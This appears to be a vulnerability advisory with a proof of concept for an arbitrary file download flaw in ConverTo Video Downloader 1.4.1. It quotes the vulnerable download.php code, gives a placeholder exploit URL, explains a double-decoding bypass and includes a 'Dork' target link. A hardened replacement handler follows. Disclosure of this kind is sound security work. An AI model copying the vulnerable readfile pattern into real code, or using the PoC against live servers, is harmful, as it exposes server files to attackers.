====================================================================================================================================
| # Title : ConverTo Video Downloader & Converter 1.4.1 - Arbitrary File Download Vulnerability |
| # Author : indoushka |
| # email : indoushka4ever@gmail.com |
| # Tested on : Windows 10 French (Pro) |
| # Version : 1.4.1 |
| # Vendor : https://codecanyon.net/item/converto-video-downloader-converter/13225966 |
| # Dork : http://vd.googglet.com/ |
====================================================================================================================================
poc :
Aug 25, 2017 – Update 1.4.1
download.php
The value of the f parameter is URL-decoded at line 5 of the original file ($file = urldecode($_GET['f']);) and handed straight to readfile() at line 12 (readfile ($file);) with no validation of the path. Nothing ties the parameter to the directory of converted videos, so any file the web server process can read is returned to the client as a download. Relevant excerpt of download.php:
<?php
if(isset($_GET['f'])){
// convertToBytes() is a helper defined elsewhere in download.php (not part of this excerpt).
// Note that the client controls the Content-Length through ?sz= as well.
$siz = convertToBytes($_GET['sz']);
// Source: PHP has already URL-decoded $_GET['f'], so this decodes the value a second time.
$file = urldecode($_GET['f']);
$rand = rand(0,5000);
header("Content-Description: File Transfer");
header("Content-Type: application/octet-stream");
header('Content-Length: ' . $siz);
header("Content-Disposition: attachment; filename=Facebook_video_$rand.mp4");
ob_clean(); flush();
// Sink: the unvalidated path is read and streamed back verbatim.
readfile ($file);
}
http://localhost/[PATH]/download.php?f=Ev!l
Here Ev!l stands for the URL-encoded path of any file the web server user can read. Because the script calls urldecode() on a value PHP has already decoded, the parameter is decoded twice, so a doubly-encoded path reaches readfile() in plain form. If allow_url_fopen is enabled in php.ini, readfile() also accepts http:// and ftp:// URLs, so the same parameter can make the server fetch and relay remote content.
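A hardened replacement for the handler is shown below. It is added here as an illustration and is not the vendor's code. It assumes converted videos are written to a single directory, DOWNLOAD_DIR (an assumed name), that a client only ever needs to name a file inside that directory by its basename, and that the converter only produces the extensions listed in resolve_download(); both the function and the extension list are assumptions.

```php
<?php
// Added example: hardened download handler for the pattern in download.php above.
// Not the vendor's code. DOWNLOAD_DIR is an assumed location for converted videos.
define('DOWNLOAD_DIR', __DIR__ . '/downloads');

/**
 * Map a client-supplied file name to a path inside DOWNLOAD_DIR, or return null.
 * Rejects directory components, NUL bytes, unexpected extensions, and anything that
 * resolves (after symlinks) to a location outside the download directory.
 */
function resolve_download(string $name): ?string
{
    // Refuse anything that is not a bare file name before touching the filesystem.
    if ($name === '' || $name !== basename($name) || strpos($name, "\0") !== false) {
        return null;
    }
    // Allow-list of the output types the converter is assumed to produce.
    if (!preg_match('/^[A-Za-z0-9_\-]+\.(mp4|mp3|webm)$/', $name)) {
        return null;
    }
    $base = realpath(DOWNLOAD_DIR);
    $path = realpath(DOWNLOAD_DIR . '/' . $name);
    if ($base === false || $path === false) {
        return null;
    }
    // realpath() has resolved symlinks; the result must still sit under the base directory.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return is_file($path) ? $path : null;
}

if (isset($_GET['f'])) {
    // $_GET is already URL-decoded by PHP; no second urldecode() call.
    $file = resolve_download((string) $_GET['f']);
    if ($file === null) {
        http_response_code(404);
        exit('Not found');
    }
    $rand = random_int(0, 5000);
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    // Size comes from the file itself, not from a client-controlled ?sz= parameter.
    header('Content-Length: ' . filesize($file));
    header('Content-Disposition: attachment; filename="Facebook_video_' . $rand . '.mp4"');
    ob_clean();
    flush();
    readfile($file);
}
```

The two checks that matter are the basename() comparison, which throws out any path containing a directory separator, and the realpath() prefix comparison, which catches symlinks inside the download directory that point elsewhere. Dropping the second urldecode() and deriving Content-Length from filesize() removes the remaining client-controlled inputs from the response.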
Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================